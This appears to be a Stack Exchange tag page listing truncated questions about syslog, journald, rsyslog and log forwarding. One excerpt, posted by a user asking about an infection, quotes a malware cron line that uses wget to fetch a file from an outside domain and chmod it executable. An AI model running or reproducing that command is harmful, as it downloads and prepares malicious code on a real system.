Skip to main content
Unix & Linux

Questions tagged [syslog]

Ask Question

syslog is a standard (RFC 5424) for message logging. Use this tag for syslog logging related messages. For generic logging messages use [logging] instead

444 questions
Newest Active Bountied Unanswered
Filter by
Sorted by
Tagged with
2 votes
1 answer
89 views

I have Ubuntu 24.04 servers with this Journald config by default: user@server:~$ systemd-analyze cat-config systemd/journald.conf # /etc/systemd/journald.conf # This file is part of systemd. ... [...
Madoc Comadrin's user avatar
  • 302
0 votes
0 answers
114 views

I am trying to understand why one of my system has /dev/log as a socket and other has /dev/log as a symbolic link. [ec2-user@ip-171-31-12-17 log]$ file /dev/log /dev/log: symbolic link to /run/systemd/...
Boogeyman's user avatar
  • 1
0 votes
1 answer
67 views

I have tried to log into journald using logger. logger test, journalctl |grep test does not show any output. The message does not reach journald even though it listening and logger is writing (I ...
maths soso's user avatar
  • 3
1 vote
1 answer
105 views

Good evening, I am running multiple cisco routers/switches and a virtualized debian install. In order to have proper forensic capabilities in cse of attack/breach/malfunction I wish to have remote ...
fsardone's user avatar
  • 11
0 votes
1 answer
56 views

On my actual macOS, there are every day 7 flat files in /var/log of name mail.log* rotating at 23:00: ### 18:20 milky-way:/etc/asl # ls -al /var/log/mail.log* -rw-r-----@ 1 root admin ...
athena's user avatar
  • 1,095
-1 votes
1 answer
471 views

I have a service defined via docker compose (see definition below). When I tried to start this service via docker-compose -f up --wait -d my_service, I get the error Error response from daemon: ...
atl123's user avatar
  • 3
0 votes
1 answer
879 views

I noticed that the default datetime format for logs in /var/log/messages is mmm [d]d hh:mm:ss, for example: Jan 4 03:46:50 1.2.3.4 ntpclient[6952]: Failed resolving address to hostname pool.ntp.org: ...
skeetastax's user avatar
  • 159
0 votes
2 answers
651 views

I am running syslog-ng on debian. How do I check which conf file was loaded upon startup? Neither systemctl status syslog-ng nor systemctl show syslog-ng tell me.
skeetastax's user avatar
  • 159
0 votes
1 answer
450 views

I have a log line that looks like this: May 20 10:25:42 192.168.20.100 Timestamp="2024-05-20 10:25:42",LogId="535666280",NodeId="192.168.1.100",Facility="Packet ...
azzid's user avatar
  • 1,020
-1 votes
1 answer
594 views

As far as I can tell, syslogd in its default configuration throws away all log data on reboot. I have observed this data on Raspbian (Debian Linux-based) and on OPNsense (FreeBSD-based). From my point ...
user149408's user avatar
  • 1,565
-1 votes
1 answer
317 views

I am writing a small plugin for Postfix using python and want to it to emit logging messages. I am not particularly familiar with python and was advised to use loguru. This was certainly easy when I ...
symcbean's user avatar
  • 6,359
0 votes
1 answer
68 views

I've configured rsyslog to forward certain log messages to a named pipe /tmp/logger.pipe. I then have a separate process reading from the named pipe. Relevant section from /etc/rsyslog.conf # Remote ...
Izzo's user avatar
  • 1,023
2 votes
1 answer
786 views

On pfSense, I've enabled Prometheus Node Exporter, but it gives the following log errors each 15 seconds: Feb 15 09:53:57 vault node_exporter[25559]: ts=2024-02-15T08:53:57.164Z caller=collector.go:...
Artur Meinild's user avatar
  • 792
0 votes
2 answers
543 views

This is occurring while backing up whole drive with rsync. I'm trying to sync two large hard drives as a backup and I'm doing so exactly as described here using the Grsync GUI. While doing so I get ...
mYnDstrEAm's user avatar
  • 4,962
1 vote
0 answers
3k views

TLDR: We use PAM with SSHD. CentOS and Ubuntu exist in the environment. For every SSHD failure of an unknown user, it creates two messages. One of the messages doesn't provide the unknown username and ...
Top-Lunch-7931's user avatar
  • 31
0 votes
0 answers
960 views

I have been receiving hard disk warnings from the smartd daemon for a while now (every 24 hours), saying that my error logs have increased. I have been trying to examine this by checking my log files, ...
tobibox's user avatar
  • 11
0 votes
1 answer
589 views

I had read that syslog is placed in a /var/log directory. But i can't open it in spite of the directory in PATH included. lm@debian:~$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/...
ant's user avatar
  • 27
1 vote
1 answer
5k views

I am new to log rotation and have a syslog server that have been setup to recieve firewall logs over 514. Now, the firewall is generating A LOT of data, ~600-800GB/day and the servers capacity is 1TB. ...
phil_sw's user avatar
  • 13
0 votes
1 answer
224 views

The log in syslogs is as follows: [UFW BLOCK] IN=wlan0 OUT= MAC=33:33:00:00:00:01:e8:48:b8:5f:a0:e8:86:dd SRC=fe80:0000:0000:0000:ea48:b8ff:fe5f:a0e8 DST=ff02:0000:0000:0000:0000:0000:0000:0001 LEN=52 ...
Yeh acc's user avatar
  • 1
0 votes
0 answers
1k views

I am doing a project where the organisation uses syslog-ng for the central remote logging servers and this will surely not change. The application suite that I am developing on, is using Red Hat ...
user581894's user avatar
  • 1
1 vote
2 answers
864 views

Here we try to break syslog file into smaller chunks. For that we use following script. #!/bin/bash date=$(date +%Y%m%d_%H%M) cp /path/to/sys.log /path/to/chuck/file.log cat /dev/null > /path/to/...
Sachith Muhandiram's user avatar
  • 183
0 votes
1 answer
377 views

My goal is to send all logs to one source remote and still log local but then send all the AuditD logs to its own source on port 20002. But for some reason, my auditd logs are still ending up with my ...
Jason's user avatar
  • 1,754
2 votes
1 answer
195 views

So, we have several Redhat Enterprise Linux servers for an internal application that we support in our team at the office. Among other things, the servers send "auto-print" reports of ...
Gael L's user avatar
  • 131
0 votes
1 answer
126 views

I have enabled the SFTP login log into the default logfile /var/log/syslog and tried to filter the login time of each user and insert into the database. But the filtering is not worked as I expected. ...
Amal P Ramesh's user avatar
  • 419
2 votes
1 answer
197 views

I have a Linux machine running Ubuntu 16.04.7 LTS that uses rsyslogd. My understanding of rsyslogd is that it rotates the content from the kernel ring buffer (ie, dmesg) to an on-disk file (ie, /var/...
Ken Lin's user avatar
  • 153
1 vote
0 answers
107 views

I updated busybox to 1.35.0 and had the same settings as earlier but for some reasons the syslogd is not outputting year in the timestamp information. Prior to this I was using busybox 1.19.3 and it ...
m4n07's user avatar
  • 191
1 vote
2 answers
2k views

I work on yocto based linux distribution. I'm not expert about systemd and neither about systemd-journald. My C program my_c_program is started at boot by the script my_script.sh. Below there is the ...
User051209's user avatar
  • 690
1 vote
1 answer
725 views

Problem: Kernel logs that occurred before syslogd starts up, do not get appended to my syslog. System Description: I have syslogd starting up about 5s into the boot sequence. I have a script that ...
SammyWammy's user avatar
  • 11
2 votes
1 answer
1k views

For a while looking for a solution that with systemd tools will give me an opportunity to bypass the journal and log directly to syslog. Potentially that can be also filtered, but only on journal not ...
jareeq's user avatar
  • 163
4 votes
3 answers
5k views

I set up my journald to limit the log size to 5GB in /etc/systemd/journald.conf and thought everything was fine. Then, yesterday, I realized that my /var/log/syslog file is in fact 12GB big. What I ...
flood's user avatar
  • 388
1 vote
1 answer
2k views

I'm using the following rsyslog configuration file to redirect logs of a program to a specific file. # Name of the program set $.program_name = "myapp"; # Path to the log file set $....
Arkaik's user avatar
  • 1,198
0 votes
1 answer
115 views

I have a malware which run every minute, i can see it from /var/log/syslog Feb 1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd &...
Augusto Murri's user avatar
  • 121
0 votes
2 answers
215 views

Considering the following architecture: I have a laptop connected to a server over ethernet. This laptop is configured to send log events with rsyslog on the server, the server is configured to accept ...
Jaay's user avatar
  • 145
0 votes
1 answer
121 views

How can the auditing feature in an AIX Unix system be configured to collect information about the removal of a directory (though rmdir) and send it to syslog?
Tekkkee's user avatar
  • 1
1 vote
0 answers
319 views

For example I have the following: pam_unix(sudo:session): session opened for user root(uid=0) by (uid=997) pam_unix(sudo:session): session closed for user root pam_unix(cron:session): session closed ...
Jason's user avatar
  • 1,754
0 votes
1 answer
148 views

I would like to know what process is meant to write Timestapms (and other parts of Log messages) in Syslog protocol. In other words, is it Syslog that sets timestamp of log message (exact time of ...
GabrijelOkorn's user avatar
  • 25
1 vote
0 answers
282 views

I got quite confused reading manual pages of klogd, dmesg and syslog(2). I would like to understand how the message produced by the kernel gets to /var/log/file. First thing I would like to get to ...
GabrijelOkorn's user avatar
  • 25
2 votes
1 answer
500 views

I have a question about a syslog application. I wrote a simple program using syslog API. I compiled and launched the program. It works, I can see logs on the journal. However, when I reconfigured ...
Lioyerar's user avatar
  • 29
5 votes
2 answers
14k views

I have a configuration /etc/systemd/[email protected] which contains the setting ForwardToSyslog=yes and a systemd service unit configured with LogNamespace=my-namespace. The documentation ...
Aaron Enberg's user avatar
  • 131
0 votes
1 answer
467 views

One physical machine had shutdown unexpected, there is no any error log about that, only get a large ^@ in one line of /var/log/syslog file such as: Dec 9 21:50:02 hostname CRON[74324]: (root) MAIL (...
VictorLee's user avatar
  • 187
0 votes
1 answer
2k views

I am new to syslog-ng and was trying to fix the issue of an error which arises due to uniqueness of the persist names in syslog-ng, I see the below error in my syslog err Error checking the ...
Manu's user avatar
  • 103
6 votes
1 answer
12k views

I'm trying to search through dozens of logfiles that were not sent to systemd-journald, and would like to filter the results by time, the way journalctl's -S (since) and -U (until) do. Option 1: ...
PFudd's user avatar
  • 203
0 votes
2 answers
716 views

OK, so basically I'm trying to give a specific date and time and I want to see all the logins that were made during the hour range, e.g. last hour or two last hours from the time and date given. I ...
kuska's user avatar
  • 1
1 vote
1 answer
521 views

Regarding the manpage of syslog there are different facilities (e.g. USER). Depending on that facility log messages going into different log files (e.g. /var/log/syslog, /var/log/messages, ...). I ...
buhtz's user avatar
  • 965
1 vote
1 answer
66 views

How do I detect if a particular ssh login was made by running a script or was it a user who typed password? I want to detect script based logins. 'auth.log' doesn't give me this info. Is there any ...
sri's user avatar
  • 11
0 votes
1 answer
335 views

I have a specific PID and my question is how can I know which port belongs to that PID. Any tips on how to know the port of a service that has a specific PID? Thanks a lot.
EuDaKi's user avatar
  • 1
2 votes
0 answers
1k views

I have two systems running NVIDIA jetpack 5.0.2, based on Ubuntu 20.04. /etc and /boot are identical on both systems. On the first system, after boot, if I try to run logger I get an error /dev/log: ...
Jayen's user avatar
  • 211
1 vote
0 answers
317 views

I am a user without sudo on a CentOS 7 system running rsyslog. I would like to log my cronjobs. Ideally, rsyslog would log all my user's cron activity to somewhere like ~/log/cron. There are good ...
Jacktose's user avatar
  • 532
1 vote
1 answer
529 views

I just installed rsyslog on rhel8. So the /etc/rsyslog.conf file is stock. Here's my custom config: /etc/rsyslog.d/10-remote.conf module(load="imudp") ruleset(name="remote_udp"){ ...
itinneed2022_1's user avatar
  • 11
1 vote
1 answer
2k views

We are using printf till now and the output was coming to stdio. Now we want to remove it from stdio and put in syslog. I have a big code base and so replacing all the printf will not be a good ...
m Rout's user avatar
  • 11

1
2 3 4 5
9